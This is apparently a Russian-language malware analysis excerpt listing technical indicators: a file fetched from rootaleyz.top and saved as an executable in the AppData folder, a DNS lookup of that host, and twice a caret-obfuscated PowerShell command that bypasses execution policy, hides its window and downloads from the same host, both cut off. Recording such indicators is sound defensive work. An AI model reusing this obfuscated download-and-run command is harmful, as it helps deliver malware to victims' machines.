Техническая информация
- http://rootaleyz.top/read.php?f=1.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "pOW^e^r^SheLL^.E^Xe -exe^cUTIo^N^poL^icy ^BYP^ASS ^-N^OPr^ofI^l^e ^-WIn^do^wST^Y^L^E Hidd^En (nE^w-^ObJ^eCt^ ^Sy^STe^M^.nET.weBCLIeN^T)^.^d^O^WN^L^oA^dfI^lE('http://rootaleyz.t...
- DNS ASK ro###leyz.top
- '<SYSTEM32>\cmd.exe' /c "pOW^e^r^SheLL^.E^Xe -exe^cUTIo^N^poL^icy ^BYP^ASS ^-N^OPr^ofI^l^e ^-WIn^do^wST^Y^L^E Hidd^En (nE^w-^ObJ^eCt^ ^Sy^STe^M^.nET.weBCLIeN^T)^.^d^O^WN^L^oA^dfI^lE('http://rootaleyz.t...' (со скрытым окном)